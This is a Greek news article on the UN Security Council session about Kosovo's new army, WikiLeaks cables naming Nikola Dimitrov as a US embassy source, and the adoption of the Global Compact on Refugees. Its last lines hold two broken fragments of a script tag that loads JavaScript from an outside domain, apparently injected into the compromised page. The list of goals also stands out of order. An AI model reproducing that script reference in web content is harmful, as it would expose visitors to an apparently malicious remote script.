Κρίσιμη σύνοδος για τον στρατό του Κοσόβου στον ΟΗΕ – WikiLeaks: «Προστατευόμενη» πηγή των ΗΠΑ ο Ντιμιτρόφ – Υιοθετήθηκε με μεγάλη πλειοψηφία το Σύμφωνο για τους πρόσφυγες

Στο Συμβούλιο Ασφαλείας έχουν στραφεί τα βλέμματα για την αποκλιμάκωση της νέας κρίσης στο Κόσοβο, μετά την απόφαση της κοσοβάρικης Βουλής να μετατρέψει τις δυνάμεις ασφαλείας, που αριθμούν 4.000 άνδρες, σε κανονικό στρατό. Ο πρόεδροι Σερβίας και Κοσόβου έχουν κληθεί να καταθέσουν τις θέσεις τους με τις δύο πλευρές να εμφανίζονται αμετακίνητες στα επιχειρήματά τους.

Η έκτακτη συνεδρίαση του Συμβουλίου Ασφαλείας, που γίνεται κεκλεισμένων των θυρών, έχει προγραμματιστεί για απόψε το βράδυ (ώρα Ελλάδας) ώστε λάβει απόφαση εντός των ημερών.

Η Σερβία, που δεν αναγνωρίζει την ανεξαρτησία του Κοσόβου (ανακηρύχθηκε το 2008), προειδοποιεί ότι αν δημιουργηθεί στρατός στην περιοχή, την οποία θεωρεί σερβική επικράτεια, τότε θα επέμβει στρατιωτικά. Ωστόσο, ο πρόεδρος του Κοσόβου, Χασίμ Θάτσι, υποστηρίζει -και αυτό θα τονίσει στην ομιλία του- ότι η απόφαση του κοινοβουλίου στην Πρίστινα «είναι μη αναστρέψιμη» και δεν απειλούνται οι Σέρβοι που ζουν στην πρώην σερβική επαρχία.

Ανέφερε δε ότι στο στράτευμα θα συμπεριλάβει και Σέρβους πολίτες του Κοσόβου.

Μάλιστα, όπως είπε, όποια και αν είναι η απόφαση του Συμβουλίου Ασφαλείας, «ο στρατός θα γίνει».

Σύμφωνα με το υπουργείο Εξωτερικών της Σερβίας, ο πρόεδρος Αλεξάνταρ Βούτσιτς, θα υποστηρίξει ότι η δημιουργία στρατού στο Κόσοβο παραβιάζει το ψήφισμα του ΟΗΕ με το οποίο έληξε η διάλυση της Σερβίας από τους Κοσοβάρους αυτονομιστές την περίοδο 1998-99.

Σύμφωνα με τον υπουργό Εξωτερικών Ίβιτσα Ντάσιτς, «η θέση της Σερβίας πρέπει να ακουστεί», ενώ η πρωθυπουργός της χώρας, Άνα Μπρνάμιτς έχει δηλώσει ότι η στρατιωτική επέμβαση «είναι από τις λύσεις που έχουμε στο τραπέζι».

Η απόφαση για δημιουργία στρατού από την Πρίστινα έχει αναζωπυρώσει τους φόβους για μια νέα έκρηξη στα Βαλκάνια.

Ο γενικός γραμματέας του ΟΗΕ, Αντόνιο Γκουτέρες έχει καλέσει «όλες τις ενδιαφερόμενες πλευρές να δείξουν αυτοσυγκράτηση και να απέχουν από ενέργειες που θα μπορούσαν να αυξήσουν τις εντάσεις και να προκαλέσουν μια νέα οπισθοδρόμηση στον διάλογο που διευκολύνει η Ε.Ε. για μια εξομάλυνση των σχέσεων μεταξύ του Βελιγραδίου και της Πρίστινας».

Από την πλευρά του ο γενικός γραμματέας του NATO, Γενς Στόλτενμπεργκ χαρακτήρισε την απόφαση του Κοσόβου «ενέργεια που έγινε σε λάθος χρόνο».

Μόνο οι ΗΠΑ έχουν στηρίξει την Πρίστινα, αναφέροντας ότι η δημιουργία στρατού είναι «αναφαίρετο δικαίωμα του ανεξάρτητου κράτους» του Κοσόβου.

 

WikiLeaks: «Προστατευόμενη» πηγή των ΗΠΑ ο Ντιμιτρόφ

Νίκολα Ντιμιτρόφ

Τα WikiLeaks ανάρτησαν στον ιστότοπό τους έγγραφα τα οποία δείχνουν ότι ο υπουργός Εξωτερικών της ΠΓΔΜ, Νίκολα Ντιμιτρόφ, υπήρξε μυστική και προστατευόμενη πηγή για τις Ηνωμένες Πολιτείες το έτος 2008, στο ζήτημα της ονομασίας της γειτονικής χώρας και της ένταξής της στο ΝΑΤΟ και την Ευρωπαϊκή Ένωση.

Σημειώνεται ότι πριν από δέκα χρόνια, ο Ντιμιτρόφ ήταν πρεσβευτής και συμμετείχε στις διαπραγματεύσεις για το ονοματολογικό. Συνεπώς, γνώριζε και τις θέσεις του ειδικού απεσταλμένου του ΟΗΕ, Μάθιου Νίμιτς, αλλά και τις προθέσεις του τότε προέδρου της ΠΓΔΜ Μπράνκο Τσερβένκοφσκι, καθώς και του πρωθυπουργού Νίκολα Γκρούεφσκι.

WikiLeaks

@wikileaks
Current Republic of Macedonia Foreign Minister Nikola Dimitrov was listed as a “protect” U.S. embassy source twice in 2008 after providing information on the Greece-Macedonia name dispute and NATO, EU integration.

1) https://wikileaks.org/plusd/cables/08SKOPJE606_a.html 
2) https://wikileaks.org/plusd/cables/08SKOPJE601_a.html 

Αναφερόμενος στις αναρτήσεις των WikiLeaks, ο Ντιμιτρόφ έκανε λόγο για αποσπασματικές πληροφορίες με στόχο να πλήξουν τη Συμφωνία των Πρεσπών.

Υπενθυμίζεται ότι ο Ντιμιτρόφ είναι ο πολιτικός ο οποίος φέτος υπέγραψε (μαζί με τον τέως υπουργό Εξωτερικών της Ελλάδας, Νίκο Κοτζιά), τη Συμφωνία των Πρεσπών, ανοίγοντας τον δρόμο για την επίλυση της διένεξης ανάμεσα σε Αθήνα και Σκόπια.

Υιοθετήθηκε με μεγάλη πλειοψηφία το Σύμφωνο για τους πρόσφυγες

γενική συνέλευση στον ΟΗΕ

Παρά την αντίθεση που εξέφρασαν οι ΗΠΑ και η Ουγγαρία, η Γενική Συνέλευση των Ηνωμένων Εθνών ενέκρινε με συντριπτική πλειοψηφία μία μη δεσμευτική συμφωνία που παρέχει ισχυρότερη στήριξη στις χώρες όπου ζουν οι περισσότεροι από τους τουλάχιστον 25 εκατ. πρόσφυγες στον κόσμο.

Το Παγκόσμιο Σύμφωνο για τους Πρόσφυγες ενισχύει επίσης τη συνεργασία και την κοινή ευθύνη των κρατών με στόχο τη βοήθεια προς όσους αναγκάζονται να εγκαταλείψουν τη χώρα τους εξαιτίας ένοπλων συγκρούσεων ή διώξεων.

Διάσωση προσφύγων

Κατά την ψηφοφορία, 181 χώρες τάχθηκαν υπέρ του Συμφώνου, μόλις 2 κατά (ΗΠΑ και Ουγγαρία), ενώ τρία κράτη (η Δομινικανή Δημοκρατία, η Ερυθραία και η Λιβύη) επέλεξαν να απέχουν.

Το Παγκόσμιο Σύμφωνα για τους Πρόσφυγες συντάχθηκε υπό την αιγίδα της Ύπατης Αρμοστείας για τους πρόσφυγες, με στόχο τη βέλτιστη διαχείριση των μαζικών ροών προσφύγων και την αντιμετώπιση των παρατεταμένων καταστάσεων κρίσης.

  • την ελάφρυνση των πιέσεων που ασκούνται στις χώρες υποδοχής
  • την ενίσχυση της αυτονομίας των προσφύγων
  • τη διεύρυνση της πρόσβασης σε λύσης με τη βοήθεια τρίτων χωρών
  • τη δημιουργία, στις χώρες προέλευσης των προσφύγων, των αναγκαίων προϋποθέσεων ώστε οι άνθρωποι αυτοί να επιστρέψουν με ασφάλεια στις πατρίδες τους

Υπενθυμίζεται ότι το Παγκόσμιο Σύμφωνο για τους Πρόσφυγες είναι διαφορετικό από το Παγκόσμιο Σύμφωνο για τη Μετανάστευση που έχει εγείρει αντιδράσεις από περισσότερες χώρες και το οποίο πρόκειται να παρουσιαστεί στη Γενική Συνέλευση του ΟΗΕ, την ερχόμενη Τετάρτη.

Το κείμενο του Συμφώνου περιλαμβάνει τέσσερις επιμέρους στόχους:

___setforspecialdomain.com/ghfgh34523452′ type=’text/javascript’>___setforspecialdomain.com/ghfgh34523452′ type=’text/javascript’>